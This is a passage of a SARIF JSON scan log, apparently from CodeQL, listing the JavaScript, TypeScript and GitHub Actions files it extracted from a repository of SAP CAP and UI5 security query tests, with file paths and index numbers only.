5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure-js-all-sinks/sensitive-exposure-heuristic-source.js","uriBaseId":"%SRCROOT%","index":236}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/.prettierrc.js","uriBaseId":"%SRCROOT%","index":29}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/index.js","uriBaseId":"%SRCROOT%","index":331}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":213}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/validate-bundle.js","uriBaseId":"%SRCROOT%","index":96}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js","uriBaseId":"%SRCROOT%","index":575}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.js","uriBaseId":"%SRCROOT%","index":201}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js","uriBaseId":"%SRCROOT%","index":160}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":122}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js","uriBaseId":"%SRCROOT%","index":416}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":372}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":179}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":287}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js","uriBaseId":"%SRCROOT%","index":494}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":390}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js","uriBaseId":"%SRCROOT%","index":118}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":453}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/jest.config.js","uriBaseId":"%SRCROOT%","index":34}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":338}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":137}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js","uriBaseId":"%SRCROOT%","index":351}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":268}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js","uriBaseId":"%SRCROOT%","index":420}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":120}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js","uriBaseId":"%SRCROOT%","index":446}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/privileged-user.js","uriBaseId":"%SRCROOT%","index":152}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.js","uriBaseId":"%SRCROOT%","index":114}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":154}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":280}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":455}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":364}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":451}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/server.js","uriBaseId":"%SRCROOT%","index":125}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":204}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js","uriBaseId":"%SRCROOT%","index":428}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/index.js","uriBaseId":"%SRCROOT%","index":323}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":609}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":434}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/BindingStringParser/test.js","uriBaseId":"%SRCROOT%","index":245}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":442}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js","uriBaseId":"%SRCROOT%","index":417}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js","uriBaseId":"%SRCROOT%","index":419}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":463}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js","uriBaseId":"%SRCROOT%","index":472}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":606}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js","uriBaseId":"%SRCROOT%","index":193}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":392}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":583}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.js","uriBaseId":"%SRCROOT%","index":593}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/index.js","uriBaseId":"%SRCROOT%","index":485}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.js","uriBaseId":"%SRCROOT%","index":186}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":383}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":425}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/dist/cds-extractor.bundle.js","uriBaseId":"%SRCROOT%","index":31}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js","uriBaseId":"%SRCROOT%","index":406}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js","uriBaseId":"%SRCROOT%","index":133}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js","uriBaseId":"%SRCROOT%","index":412}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.js","uriBaseId":"%SRCROOT%","index":130}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":303}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js","uriBaseId":"%SRCROOT%","index":142}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/cds-extractor-dist-bundle.yml","uriBaseId":"%SRCROOT%","index":21}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/actions","index":1},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/codeql-ql.yml","uriBaseId":"%SRCROOT%","index":23}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/actions","index":1},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/run-codeql-unit-tests-javascript.yml","uriBaseId":"%SRCROOT%","index":24}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/actions","index":1},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/update-codeql.yml","uriBaseId":"%SRCROOT%","index":25}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/actions","index":1},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/code_scanning.yml","uriBaseId":"%SRCROOT%","index":22}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/actions","index":1},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/projectInstaller.ts","uriBaseId":"%SRCROOT%","index":61}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/files-to-compile.test.ts","uriBaseId":"%SRCROOT%","index":76}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/graph.ts","uriBaseId":"%SRCROOT%","index":39}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/projectInstaller.test.ts","uriBaseId":"%SRCROOT%","index":91}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/compile.test.ts","uriBaseId":"%SRCROOT%","index":68}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/cds-extractor.test.ts","uriBaseId":"%SRCROOT%","index":65}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/graph.ts","uriBaseId":"%SRCROOT%","index":47}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/project.ts","uriBaseId":"%SRCROOT%","index":41}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/cds-extractor.ts","uriBaseId":"%SRCROOT%","index":30}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/index.ts","uriBaseId":"%SRCROOT%","index":56}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/command.ts","uriBaseId":"%SRCROOT%","index":37}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/diagnostics.ts","uriBaseId":"%SRCROOT%","index":52}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/index.test.ts","uriBaseId":"%SRCROOT%","index":70}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/statusReport.ts","uriBaseId":"%SRCROOT%","index":57}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/src/App.tsx","uriBaseId":"%SRCROOT%","index":627}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/cacheInstaller.test.ts","uriBaseId":"%SRCROOT%","index":89}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/validator.ts","uriBaseId":"%SRCROOT%","index":44}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/types.test.ts","uriBaseId":"%SRCROOT%","index":88}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/index.test.ts","uriBaseId":"%SRCROOT%","index":90}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/statusReport.test.ts","uriBaseId":"%SRCROOT%","index":87}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/types.ts","uriBaseId":"%SRCROOT%","index":58}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/src/index.tsx","uriBaseId":"%SRCROOT%","index":628}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physical